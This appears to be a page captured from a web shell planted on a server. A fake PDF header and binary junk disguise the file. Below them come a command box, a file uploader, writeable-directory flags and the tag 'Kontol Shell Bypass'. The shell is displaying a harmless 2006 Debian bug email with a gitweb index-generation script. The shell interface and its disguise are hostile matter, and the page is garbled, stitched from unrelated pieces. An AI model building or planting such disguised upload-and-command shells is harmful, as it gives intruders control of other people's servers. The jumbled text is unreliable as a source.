%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/gitweb/examples/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/gitweb/examples/index.aux-generation
From: Matthew Wilcox <matthew@wil.cx>
To: 383219@bugs.debian.org
Cc: Roland Mas <lolando@debian.org>
Subject: index.aux generation
Date: Thu, 24 Aug 2006 08:55:10 -0600

Alioth needs to generate an index.aux file.  It'd be helpful if we had
an example script for doing this.  Here's the script used for
git.infradead.org (MIT licence, says its author):

--- cut ---
#!/bin/sh

cd /home
for a in * ; do [ -r $a/public_git ] && [ ! -d /home/git/users/$a ] && ln -s /home/$a/public_git /home/git/users/$a ; done

cd /home/git
find . -name 'HEAD' | grep ^[-./=+a-zA-Z0-9]*\$ | sed s:/HEAD\$:: | while read DIR ; do
        TREEUID=`stat -c %U $DIR`
        TREEUSERNAME=`grep ^$TREEUID: /etc/passwd | cut -f5 -d: | sed s/\ /+/`
        if [ "$TREEUSERNAME" = "" ]; then
                TREEUSERNAME=$TREEUID
        fi
        echo $DIR $TREEUSERNAME | sed s:/:%2F:g
done > /home/git/.index.aux.$$

mv /home/git/.index.aux.$$ /home/git/.index.aux

--- cut ---

I suspect Alioth wants something like (untested ...)

cd /srv/git.debian.org/git
ls */*/HEAD | grep ^[-./=+a-zA-Z0-9]*\$ | sed s:/HEAD\$:: | while read DIR ; do
        TREEUID=`stat -c %U $DIR`
        TREEUSERNAME=`XXX`
        if [ "$TREEUSERNAME" = "" ]; then
                TREEUSERNAME=$TREEUID
        fi
        echo $DIR $TREEUSERNAME | sed s:/:%2F:g
done > /srv/git.debian.org/.index.aux.$$

mv /srv/git.debian.org/.index.aux.$$ /srv/git.debian.org/.index.aux

where XXX would be how to turn a username into the name of a user.
I dunno how Alioth works; ldap or postgres db seem plausible answers.

Kontol Shell Bypass